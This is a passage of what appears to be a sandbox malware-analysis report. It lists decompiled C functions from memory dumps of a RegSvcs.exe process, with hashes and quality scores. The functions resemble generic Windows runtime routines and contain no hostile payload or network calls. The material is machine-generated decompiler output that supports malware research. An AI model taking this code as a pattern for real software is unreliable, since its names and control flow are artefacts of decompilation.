                                          					_t98 = _v40;
                                          					asm("sbb edx, [ebp-0x20]");
                                          					_t88 = _t90 - _v12 - _t105;
                                          					_t75 = _a4;
                                          					asm("sbb edx, eax");
                                          					_t31 = _t98 + 0xc8; // 0x13bfb53
                                          					_t101 = _t31;
                                          					 *_t101 = _t88;
                                          					_t101[1] = _t97;
                                          					goto L15;
                                          				}
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8e7a6ebe9cddebde07aeb73ee13ba6f4a6dda4257e687342727c4923e05b22a
                                          • Instruction ID: 1a382549452f944b525c8cb2be50b19fcde306eb15a6976837503f0f5297756e
                                          • Opcode Fuzzy Hash: d8e7a6ebe9cddebde07aeb73ee13ba6f4a6dda4257e687342727c4923e05b22a
                                          • Instruction Fuzzy Hash: D8519F71A00606DFCB19CFACC484AAEFBF5BF49318F24855AD559A7348DB70A944CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E0130EF40(intOrPtr __ecx) {
                                          				char _v5;
                                          				char _v6;
                                          				char _v7;
                                          				char _v8;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t58;
                                          				char _t59;
                                          				signed char _t69;
                                          				void* _t73;
                                          				signed int _t74;
                                          				char _t79;
                                          				signed char _t81;
                                          				signed int _t85;
                                          				signed int _t87;
                                          				intOrPtr _t90;
                                          				signed char* _t91;
                                          				void* _t92;
                                          				signed int _t94;
                                          				void* _t96;
                                          
                                          				_t90 = __ecx;
                                          				_v16 = __ecx;
                                          				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                                          					_t58 =  *((intOrPtr*)(__ecx));
                                          					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                          						E012F9080(_t73, __ecx, __ecx, _t92);
                                          					}
                                          				}
                                          				_t74 = 0;
                                          				_t96 =  *0x7ffe036a - 1;
                                          				_v12 = 0;
                                          				_v7 = 0;
                                          				if(_t96 > 0) {
                                          					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                          					_v12 = _t74;
                                          					_v7 = _t96 != 0;
                                          				}
                                          				_t79 = 0;
                                          				_v8 = 0;
                                          				_v5 = 0;
                                          				while(1) {
                                          					L4:
                                          					_t59 = 1;
                                          					L5:
                                          					while(1) {
                                          						if(_t59 == 0) {
                                          							L12:
                                          							_t21 = _t90 + 4; // 0x77d3c21e
                                          							_t87 =  *_t21;
                                          							_v6 = 0;
                                          							if(_t79 != 0) {
                                          								if((_t87 & 0x00000002) != 0) {
                                          									goto L19;
                                          								}
                                          								if((_t87 & 0x00000001) != 0) {
                                          									_v6 = 1;
                                          									_t74 = _t87 ^ 0x00000003;
                                          								} else {
                                          									_t51 = _t87 - 2; // -2
                                          									_t74 = _t51;
                                          								}
                                          								goto L15;
                                          							} else {
                                          								if((_t87 & 0x00000001) != 0) {
                                          									_v6 = 1;
                                          									_t74 = _t87 ^ 0x00000001;
                                          								} else {
                                          									_t26 = _t87 - 4; // -4
                                          									_t74 = _t26;
                                          									if((_t74 & 0x00000002) == 0) {
                                          										_t74 = _t74 - 2;
                                          									}
                                          								}
                                          								L15:
                                          								if(_t74 == _t87) {
                                          									L19:
                                          									E012F2D8A(_t74, _t90, _t87, _t90);
                                          									_t74 = _v12;
                                          									_v8 = 1;
                                          									if(_v7 != 0 && _t74 > 0x64) {
                                          										_t74 = _t74 - 1;
                                          										_v12 = _t74;
                                          									}
                                          									_t79 = _v5;
                                          									goto L4;
                                          								}
                                          								asm("lock cmpxchg [esi], ecx");
                                          								if(_t87 != _t87) {
                                          									_t74 = _v12;
                                          									_t59 = 0;
                                          									_t79 = _v5;
                                          									continue;
                                          								}
                                          								if(_v6 != 0) {
                                          									_t74 = _v12;
                                          									L25:
                                          									if(_v7 != 0) {
                                          										if(_t74 < 0x7d0) {
                                          											if(_v8 == 0) {
                                          												_t74 = _t74 + 1;
                                          											}
                                          										}
                                          										_t38 = _t90 + 0x14; // 0x0
                                          										_t39 = _t90 + 0x14; // 0x0
                                          										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                          										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                          											_t85 = _t85 & 0xff000000;
                                          										}
                                          										 *(_t90 + 0x14) = _t85;
                                          									}
                                          									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          									 *((intOrPtr*)(_t90 + 8)) = 1;
                                          									return 0;
                                          								}
                                          								_v5 = 1;
                                          								_t87 = _t74;
                                          								goto L19;
                                          							}
                                          						}
                                          						_t94 = _t74;
                                          						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                          						if(_t74 == 0) {
                                          							goto L12;
                                          						} else {
                                          							_t91 = _t90 + 4;
                                          							goto L8;
                                          							L9:
                                          							while((_t81 & 0x00000001) != 0) {
                                          								_t69 = _t81;
                                          								asm("lock cmpxchg [edi], edx");
                                          								if(_t69 != _t81) {
                                          									_t81 = _t69;
                                          									continue;
                                          								}
                                          								_t90 = _v16;
                                          								goto L25;
                                          							}
                                          							asm("pause");
                                          							_t94 = _t94 - 1;
                                          							if(_t94 != 0) {
                                          								L8:
                                          								_t81 =  *_t91;
                                          								goto L9;
                                          							} else {
                                          								_t90 = _v16;
                                          								_t79 = _v5;
                                          								goto L12;
                                          							}
                                          						}
                                          					}
                                          				}
                                          			}

                                          0x0130f042
                                          0x0130efb7
                                          0x0130efb9
                                          0x0130efbc
                                          0x0130efb0
                                          0x0130efb0
                                          0x00000000
                                          0x0130efbe
                                          0x0130efbe
                                          0x0130efc1
                                          0x00000000
                                          0x0130efc1
                                          0x0130efbc
                                          0x0130efaa
                                          0x0130ef91

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction ID: cffbdb4f4a53a05418d29b62ace3e623e5715b4844f13c34153c1694d2b7f13d
                                          • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                          • Instruction Fuzzy Hash: 7C51E030A04249DFEB26CB68C1A0BAEFBF5AF0531CF1881BCD955972C2C375A989C751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 84%
                                          			E013C740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                          				signed short* _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _t55;
                                          				void* _t56;
                                          				intOrPtr* _t66;
                                          				intOrPtr* _t69;
                                          				void* _t74;
                                          				intOrPtr* _t78;
                                          				intOrPtr* _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr _t83;
                                          				signed short* _t84;
                                          				intOrPtr _t85;
                                          				signed int _t87;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t93;
                                          				intOrPtr* _t94;
                                          				void* _t98;
                                          
                                          				_t84 = __edx;
                                          				_t80 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t55 = __ecx;
                                          				_v8 = __edx;
                                          				_t87 =  *__edx & 0x0000ffff;
                                          				_v12 = __ecx;
                                          				_t3 = _t55 + 0x154; // 0x154
                                          				_t93 = _t3;
                                          				_t78 =  *_t93;
                                          				_t4 = _t87 + 2; // 0x2
                                          				_t56 = _t4;
                                          				while(_t78 != _t93) {
                                          					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                          						L4:
                                          						_t78 =  *_t78;
                                          						continue;
                                          					} else {
                                          						_t7 = _t78 + 0x18; // 0x18
                                          						if(E0134D4F0(_t7, _t84[2], _t87) == _t87) {
                                          							_t40 = _t78 + 0xc; // 0xc
                                          							_t94 = _t40;
                                          							_t90 =  *_t94;
                                          							while(_t90 != _t94) {
                                          								_t41 = _t90 + 8; // 0x8
                                          								_t74 = E0133F380(_a4, _t41, 0x10);
                                          								_t98 = _t98 + 0xc;
                                          								if(_t74 != 0) {
                                          									_t90 =  *_t90;
                                          									continue;
                                          								}
                                          								goto L12;
                                          							}
                                          							_t82 = L01314620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                          							if(_t82 != 0) {
                                          								_t46 = _t78 + 0xc; // 0xc
                                          								_t69 = _t46;
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								_t85 =  *_t69;
                                          								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                          									L20:
                                          									_t82 = 3;
                                          									asm("int 0x29");
                                          								}
                                          								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                          								 *_t82 = _t85;
                                          								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                          								 *_t69 = _t82;
                                          								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                          								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                          								goto L11;
                                          							} else {
                                          								L18:
                                          								_push(0xe);
                                          								_pop(0);
                                          							}
                                          						} else {
                                          							_t84 = _v8;
                                          							_t9 = _t87 + 2; // 0x2
                                          							_t56 = _t9;
                                          							goto L4;
                                          						}
                                          					}
                                          					L12:
                                          					return 0;
                                          				}
                                          				_t10 = _t87 + 0x1a; // 0x1a
                                          				_t78 = L01314620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                          				if(_t78 == 0) {
                                          					goto L18;
                                          				} else {
                                          					_t12 = _t87 + 2; // 0x2
                                          					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                          					_t16 = _t78 + 0x18; // 0x18
                                          					E0133F3E0(_t16, _v8[2], _t87);
                                          					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                          					_t19 = _t78 + 0xc; // 0xc
                                          					_t66 = _t19;
                                          					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                          					 *_t66 = _t66;
                                          					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                          					_t81 = L01314620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                          					if(_t81 == 0) {
                                          						goto L18;
                                          					} else {
                                          						_t26 = _t78 + 0xc; // 0xc
                                          						_t69 = _t26;
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						_t85 =  *_t69;
                                          						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                          							goto L20;
                                          						} else {
                                          							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                          							 *_t81 = _t85;
                                          							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                          							 *_t69 = _t81;
                                          							_t83 = _v12;
                                          							 *(_t78 + 8) = 1;
                                          							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                          							_t34 = _t83 + 0x154; // 0x1ba
                                          							_t69 = _t34;
                                          							_t85 =  *_t69;
                                          							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                          								goto L20;
                                          							} else {
                                          								 *_t78 = _t85;
                                          								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                          								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                          								 *_t69 = _t78;
                                          								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                          							}
                                          						}
                                          						goto L11;
                                          					}
                                          				}
                                          				goto L12;
                                          			}






















                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction ID: 2b7236b09d27ab4ec159699aac8d5de58698ae33affc88e6a1e783cc1dec111b
                                          • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                          • Instruction Fuzzy Hash: CF518D71600646EFDB16CF18C480A96BBB9FF55708F14C0AAE9089F222E771E946CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 97%
                                          			E01322990() {
                                          				signed int* _t62;
                                          				signed int _t64;
                                          				intOrPtr _t66;
                                          				signed short* _t69;
                                          				intOrPtr _t76;
                                          				signed short* _t79;
                                          				void* _t81;
                                          				signed int _t82;
                                          				signed short* _t83;
                                          				signed int _t87;
                                          				intOrPtr _t91;
                                          				void* _t98;
                                          				signed int _t99;
                                          				void* _t101;
                                          				signed int* _t102;
                                          				void* _t103;
                                          				void* _t104;
                                          				void* _t107;
                                          
                                          				_push(0x20);
                                          				_push(0x13cff00);
                                          				E0134D08C(_t81, _t98, _t101);
                                          				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                          				_t99 = 0;
                                          				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                          				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                          				if(_t82 == 0) {
                                          					_t62 = 0xc0000100;
                                          				} else {
                                          					 *((intOrPtr*)(_t103 - 4)) = 0;
                                          					_t102 = 0xc0000100;
                                          					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                          					_t64 = 4;
                                          					while(1) {
                                          						 *(_t103 - 0x24) = _t64;
                                          						if(_t64 == 0) {
                                          							break;
                                          						}
                                          						_t87 = _t64 * 0xc;
                                          						 *(_t103 - 0x2c) = _t87;
                                          						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x12d1664));
                                          						if(_t107 <= 0) {
                                          							if(_t107 == 0) {
                                          								_t79 = E0133E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x12d1668)), _t82);
                                          								_t104 = _t104 + 0xc;
                                          								__eflags = _t79;
                                          								if(__eflags == 0) {
                                          									_t102 = E013751BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x12d166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                          									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                          									break;
                                          								} else {
                                          									_t64 =  *(_t103 - 0x24);
                                          									goto L5;
                                          								}
                                          								goto L13;
                                          							} else {
                                          								L5:
                                          								_t64 = _t64 - 1;
                                          								continue;
                                          							}
                                          						}
                                          						break;
                                          					}
                                          					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                          					__eflags = _t102;
                                          					if(_t102 < 0) {
                                          						__eflags = _t102 - 0xc0000100;
                                          						if(_t102 == 0xc0000100) {
                                          							_t83 =  *((intOrPtr*)(_t103 + 8));
                                          							__eflags = _t83;
                                          							if(_t83 != 0) {
                                          								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                          								__eflags =  *_t83 - _t99;
                                          								if( *_t83 == _t99) {
                                          									_t102 = 0xc0000100;
                                          									goto L19;
                                          								} else {
                                          									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                          									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                          									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                          									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                          										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                          										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                          											L26:
                                          											_t102 = E01322AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                          											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                          											__eflags = _t102 - 0xc0000100;
                                          											if(_t102 != 0xc0000100) {
                                          												goto L12;
                                          											} else {
                                          												_t99 = 1;
                                          												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                          												goto L18;
                                          											}
                                          										} else {
                                          											_t69 = E01306600( *((intOrPtr*)(_t91 + 0x1c)));
                                          											__eflags = _t69;
                                          											if(_t69 != 0) {
                                          												goto L26;
                                          											} else {
                                          												_t83 =  *((intOrPtr*)(_t103 + 8));
                                          												goto L18;
                                          											}
                                          										}
                                          									} else {
                                          										L18:
                                          										_t102 = E01322C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                          										L19:
                                          										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                          										goto L12;
                                          									}
                                          								}
                                          								L28:
                                          							} else {
                                          								E0130EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                          								 *((intOrPtr*)(_t103 - 4)) = 1;
                                          								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                          								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                          								_t76 = E01322AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                          								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                          								__eflags = _t76 - 0xc0000100;
                                          								if(_t76 == 0xc0000100) {
                                          									 *((intOrPtr*)(_t103 - 0x1c)) = E01322C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                          								}
                                          								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                          								E01322ACB();
                                          							}
                                          						}
                                          					}
                                          					L12:
                                          					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                          					_t62 = _t102;
                                          				}
                                          				L13:
                                          				return E0134D0D1(_t62);
                                          				goto L28;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26b44c86534a34d53343967cff2823868c4a43255e82eeecb848bdec9cfef2c9
                                          • Instruction ID: 2bfd9e181042d65ddf22ce78a84e834278fe7978798f14abeb7b0381f709ca65
                                          • Opcode Fuzzy Hash: 26b44c86534a34d53343967cff2823868c4a43255e82eeecb848bdec9cfef2c9
                                          • Instruction Fuzzy Hash: 58517B71A0022ADFEF25EF59CC40AEFBBB5BF58358F008165E900AB664C7319952CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E01324BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                          				signed int _v8;
                                          				short _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				char _v36;
                                          				char _v156;
                                          				short _v158;
                                          				intOrPtr _v160;
                                          				char _v164;
                                          				intOrPtr _v168;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t45;
                                          				intOrPtr _t74;
                                          				signed char _t77;
                                          				intOrPtr _t84;
                                          				char* _t85;
                                          				void* _t86;
                                          				intOrPtr _t87;
                                          				signed short _t88;
                                          				signed int _t89;
                                          
                                          				_t83 = __edx;
                                          				_v8 =  *0x13ed360 ^ _t89;
                                          				_t45 = _a8 & 0x0000ffff;
                                          				_v158 = __edx;
                                          				_v168 = __ecx;
                                          				if(_t45 == 0) {
                                          					L22:
                                          					_t86 = 6;
                                          					L12:
                                          					E012FCC50(_t86);
                                          					L11:
                                          					return E0133B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                          				}
                                          				_t77 = _a4;
                                          				if((_t77 & 0x00000001) != 0) {
                                          					goto L22;
                                          				}
                                          				_t8 = _t77 + 0x34; // 0xdce0ba00
                                          				if(_t45 !=  *_t8) {
                                          					goto L22;
                                          				}
                                          				_t9 = _t77 + 0x24; // 0x13e8504
                                          				E01312280(_t9, _t9);
                                          				_t87 = 0x78;
                                          				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                                          				E0133FA60( &_v156, 0, _t87);
                                          				_t13 = _t77 + 0x30; // 0x3db8
                                          				_t85 =  &_v156;
                                          				_v36 =  *_t13;
                                          				_v28 = _v168;
                                          				_v32 = 0;
                                          				_v24 = 0;
                                          				_v20 = _v158;
                                          				_v160 = 0;
                                          				while(1) {
                                          					_push( &_v164);
                                          					_push(_t87);
                                          					_push(_t85);
                                          					_push(0x18);
                                          					_push( &_v36);
                                          					_push(0x1e);
                                          					_t88 = E0133B0B0();
                                          					if(_t88 != 0xc0000023) {
                                          						break;
                                          					}
                                          					if(_t85 !=  &_v156) {
                                          						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                                          					}
                                          					_t84 = L01314620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                                          					_v168 = _v164;
                                          					if(_t84 == 0) {
                                          						_t88 = 0xc0000017;
                                          						goto L19;
                                          					} else {
                                          						_t74 = _v160 + 1;
                                          						_v160 = _t74;
                                          						if(_t74 >= 0x10) {
                                          							L19:
                                          							_t86 = E012FCCC0(_t88);
                                          							if(_t86 != 0) {
                                          								L8:
                                          								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                                          								_t30 = _t77 + 0x24; // 0x13e8504
                                          								E0130FFB0(_t77, _t84, _t30);
                                          								if(_t84 != 0 && _t84 !=  &_v156) {
                                          									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                                          								}
                                          								if(_t86 != 0) {
                                          									goto L12;
                                          								} else {
                                          									goto L11;
                                          								}
                                          							}
                                          							L6:
                                          							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                                          							if(_v164 != 0) {
                                          								_t83 = _t84;
                                          								E01324F49(_t77, _t84);
                                          							}
                                          							goto L8;
                                          						}
                                          						_t87 = _v168;
                                          						continue;
                                          					}
                                          				}
                                          				if(_t88 != 0) {
                                          					goto L19;
                                          				}
                                          				goto L6;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7843c11d577576823c3f0a3dc3896274021c77a7cfcc00f9767fea23640c7f56
                                          • Instruction ID: 60de789572499d95cd6caa88d7b6a810e51df0f0f7b76665f4341dd8f8662b21
                                          • Opcode Fuzzy Hash: 7843c11d577576823c3f0a3dc3896274021c77a7cfcc00f9767fea23640c7f56
                                          • Instruction Fuzzy Hash: FF41B571A0022DABDF21EF6CC941FEA77B8AF45754F0140A5E908AB245D774DE84CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E01324D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v12;
                                          				char _v176;
                                          				char _v177;
                                          				char _v184;
                                          				intOrPtr _v192;
                                          				intOrPtr _v196;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed short _t42;
                                          				char* _t44;
                                          				intOrPtr _t46;
                                          				intOrPtr _t50;
                                          				char* _t57;
                                          				intOrPtr _t59;
                                          				intOrPtr _t67;
                                          				signed int _t69;
                                          
                                          				_t64 = __edx;
                                          				_v12 =  *0x13ed360 ^ _t69;
                                          				_t65 = 0xa0;
                                          				_v196 = __edx;
                                          				_v177 = 0;
                                          				_t67 = __ecx;
                                          				_v192 = __ecx;
                                          				E0133FA60( &_v176, 0, 0xa0);
                                          				_t57 =  &_v176;
                                          				_t59 = 0xa0;
                                          				if( *0x13e7bc8 != 0) {
                                          					L3:
                                          					while(1) {
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						asm("movsd");
                                          						_t67 = _v192;
                                          						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                          						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                          						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                          						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                          						_push( &_v184);
                                          						_push(_t59);
                                          						_push(_t57);
                                          						_push(0xa0);
                                          						_push(_t57);
                                          						_push(0xf);
                                          						_t42 = E0133B0B0();
                                          						if(_t42 != 0xc0000023) {
                                          							break;
                                          						}
                                          						if(_v177 != 0) {
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                          						}
                                          						_v177 = 1;
                                          						_t44 = L01314620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                          						_t59 = _v184;
                                          						_t57 = _t44;
                                          						if(_t57 != 0) {
                                          							continue;
                                          						} else {
                                          							_t42 = 0xc0000017;
                                          							break;
                                          						}
                                          					}
                                          					if(_t42 != 0) {
                                          						_t65 = E012FCCC0(_t42);
                                          						if(_t65 != 0) {
                                          							L10:
                                          							if(_v177 != 0) {
                                          								if(_t57 != 0) {
                                          									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                          								}
                                          							}
                                          							_t46 = _t65;
                                          							L12:
                                          							return E0133B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                          						}
                                          						L7:
                                          						_t50 = _a4;
                                          						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                          						if(_t50 != 3) {
                                          							if(_t50 == 2) {
                                          								goto L8;
                                          							}
                                          							L9:
                                          							if(E0133F380(_t67 + 0xc, 0x12d5138, 0x10) == 0) {
                                          								 *0x13e60d8 = _t67;
                                          							}
                                          							goto L10;
                                          						}
                                          						L8:
                                          						_t64 = _t57 + 0x28;
                                          						E01324F49(_t67, _t57 + 0x28);
                                          						goto L9;
                                          					}
                                          					_t65 = 0;
                                          					goto L7;
                                          				}
                                          				if(E01324E70(0x13e86b0, 0x1325690, 0, 0) != 0) {
                                          					_t46 = E012FCCC0(_t56);
                                          					goto L12;
                                          				} else {
                                          					_t59 = 0xa0;
                                          					goto L3;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d0236cd216e65e50637c969809a38b6c319f3ef1e58d92a96e708ddd7c132ff2
                                          • Instruction ID: a1829b4d68898588448119d6880f1c47ae9f9bb20502a163c9bafd34922fd9ab
                                          • Opcode Fuzzy Hash: d0236cd216e65e50637c969809a38b6c319f3ef1e58d92a96e708ddd7c132ff2
                                          • Instruction Fuzzy Hash: AA41D871A443289FFB32EF18CC81F66BBA9EB54718F044099E9499B285D770DD44CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
